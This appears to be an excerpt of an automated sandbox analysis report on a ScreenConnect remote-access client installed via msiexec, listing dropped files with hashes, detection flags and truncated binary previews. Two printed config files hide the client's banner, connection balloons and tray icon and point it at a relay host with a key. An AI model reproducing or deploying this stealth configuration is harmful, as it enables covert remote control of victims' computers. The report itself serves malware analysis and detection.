                                      SHA-512:6B0DA069BBB914B4A39C6FDB4CBD8FAF16136266B6281EBE29E0BC17E3B2DD146E1A99C06B15AAC8F155BF16191A6741E5E02F4586ED442F1E021AFE98411D9D
                                      Malicious:false
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\49dfbf.rbs, Author: Joe Security
                                      Reputation:unknown
                                      Preview:...@IXOS.@.....@.e1Z.@.....@.....@.....@.....@.....@......&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{E29000A5-D988-BF34-ACFB-64A448AB1544}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{8E57D407-5D27-BB2E-53F9-13C161E29BDA}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{CE2EDB79-B248-8637-FD32-785C13A46331}&.{8FE752F3-A90B-15F1-EEA9-E11C4D88E962}.@......&.{0BF493B6-0475-E8DC-7971-F55AFBC83A92}&.{8FE752F3-A90B-15F1-EEA9
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):347
                                      Entropy (8bit):4.803780834806902
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:EC6BAD264881A1AE9D05F73712399809
                                      SHA1:A7921B44D20ED663D486210C0775C96C45C08F7B
                                      SHA-256:5748A4BB4CC8E1E9BB3832E1F9E8914038A1B97D2C7523EC342E596317208FB8
                                      SHA-512:ED77CAFA64FE224CB11718CE26906ED807EEB49B2D59E359A7AB0196CE3DBB177663F91E116354E56C6B2441D091A0A07F71413723B7F8DEC1CB946FA2045E64
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.1..../Please do not turn off or unplug your computer...
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):5733
                                      Entropy (8bit):4.54751304306711
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:6F99B6E5484B5785AB7BF8E46882205A
                                      SHA1:8304A40796E3AA805F96F9AB6FCAC2E5A9676C6E
                                      SHA-256:E15E9D01D8049FF1E1B01E8E9845DF20A4C80A9CF883AA84E0E407A2D865B8E3
                                      SHA-512:56226014F2C00C062D7505687B2166CA2DA905FC921E292EAEDD95DC1FB9AD093EB9D1F657F7BA45B32E6040EE09361FB14535F6D0BF4E19FABF6B19942D928D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....1P)...H.p...5...............0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e..... .....PNG........IHDR.............[i.@...KPLTE.x........l......{..v........r.R..m...p..........`..d._..@..s........dFU...0IDATx...n.0.....icS......i.nF.....s.(g..+..u..5V.....i..Mk.T.......y..r]c..p.|.Dy....5.:.[C.........................................................s.>..G..[[).....o.>.Z.-...>...X....W...?....yF.{m|I.8..r.k.NIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIY.l.o.}NctiZc.....r..X.V..7r.......h.,.....IEND.B`...#124586 .........C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C..
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):50133
                                      Entropy (8bit):4.759054454534641
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):26722
                                      Entropy (8bit):7.7401940386372345
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):197120
                                      Entropy (8bit):6.586775768189165
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:3724F06F3422F4E42B41E23ACB39B152
                                      SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                      SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                      SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):68096
                                      Entropy (8bit):6.06942231395039
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5DB908C12D6E768081BCED0E165E36F8
                                      SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                      SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                      SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):95512
                                      Entropy (8bit):6.504684691533346
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:75B21D04C69128A7230A0998086B61AA
                                      SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                      SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                      SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):548864
                                      Entropy (8bit):6.034211651049746
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                      SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                      SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                      SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1721856
                                      Entropy (8bit):6.639085961200334
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                      SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                      SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                      SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):260168
                                      Entropy (8bit):6.416438906122177
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                      SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                      SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                      SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):61208
                                      Entropy (8bit):6.310126082367387
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:AFA97CAF20F3608799E670E9D6253247
                                      SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                      SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                      SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):602392
                                      Entropy (8bit):6.176232491934078
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                      SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                      SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                      SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):842248
                                      Entropy (8bit):6.268561504485627
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:BE74AB7A848A2450A06DE33D3026F59E
                                      SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                      SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                      SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):81688
                                      Entropy (8bit):5.8618809599146005
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                      SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                      SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                      SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:unknown
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):266
                                      Entropy (8bit):4.842791478883622
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1064
                                      Entropy (8bit):4.70778105050897
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:69A203C387AE5E54AEF357BF6614DF0F
                                      SHA1:7D3E844BBE17ECA02668F76D74771CB409152A67
                                      SHA-256:8DF130460353ADB15B0D380ABFEA2C21E3D505C9CBD05435E46753A4BC28B5F8
                                      SHA-512:EA44F2313BE10712AD97CE743FADEBDBACD2B4788339567F3796498935119777F943D57BD57516D1EFE9FC0D8E0E1F1D143A4E8888604C795D80ACC18E2B4D1D
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnHide" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="EphemeralUserDisableDayCount" serializeAs="String">.. <value>60</value>.. </se
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):956
                                      Entropy (8bit):5.7620094502294785
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:5BEECFFFFC74F49700D1EAC5A1AC5545
                                      SHA1:F7FFBDC8E37A62B480DDD3D04A52F8A3418D5F20
                                      SHA-256:257FA1FF9F14E80025ACBEA5CEB1EE308C32A948289361F8DCDA666C82B8FB82
                                      SHA-512:B0E447C5062116E2B1F6AB5E619D095B63E85076F83E912BF038CEB6DC7984F0E5FF0FF26FFABE5ABD5CCEAE498B1562EB63784A8C019551FAAD3B828FEFBC85
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=slplegalfinance.com&amp;p=443&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                      Category:dropped
                                      Size (bytes):1088392
                                      Entropy (8bit):7.789940577622617
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                      SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                      SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
